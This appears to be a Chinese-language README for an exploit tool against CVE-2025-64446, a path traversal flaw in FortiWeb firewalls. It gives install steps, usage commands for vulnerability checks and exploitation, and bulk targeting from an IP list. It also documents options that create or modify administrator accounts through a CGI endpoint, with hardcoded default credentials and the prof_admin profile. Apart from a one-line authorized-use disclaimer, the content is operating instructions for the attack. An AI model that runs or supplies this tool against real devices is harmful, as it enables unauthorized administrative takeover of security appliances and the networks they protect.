适用于 FortiWeb 设备的 CVE-2025-64446 漏洞验证与利用工具。
该工具用于测试和利用 FortiWeb Web 应用防火墙中的路径遍历漏洞(CVE-2025-64446)。它可用于验证漏洞状态,或利用 CGI 端点创建/修改用户账户。
pip install -r requirements.txt
python3 exploit.py -t <target_ip> --check
python3 exploit.py -t <target_ip> --exploit
python3 exploit.py -t <target_ip> --exploit --username sxy --password sxyrxyadmin1!
python3 exploit.py -l targets.txt --check
创建 targets.txt 文件,每行一个 IP 地址:
192.168.1.100
192.168.1.101
192.168.1.102
-t, --target - 目标 IP 地址(若未使用 --targets-file 则为必填)-l, --targets-file - 包含目标 IP 地址的文件(每行一个,若未使用 --target 则为必填)-p, --port - 目标端口(默认值:443)--http - 使用 HTTP 而非 HTTPS--check - 仅进行漏洞验证(只读)--exploit - 执行 CGI 端点漏洞利用--username - 用于漏洞利用的用户名(默认值:sxy)--password - 要设置的密码(默认值:sxyrxyadmin1!)--profname - 配置文件名称(默认值:prof_admin)--vdom - VDOM 名称(默认值:root)--loginname - 登录名称(默认值:admin)--testpoint-name - 要创建的 Testpoint/用户名(默认值:Testpoint)本工具仅用于经授权的安全研究和教育目的。只能在您拥有或已获得明确测试许可的系统上使用。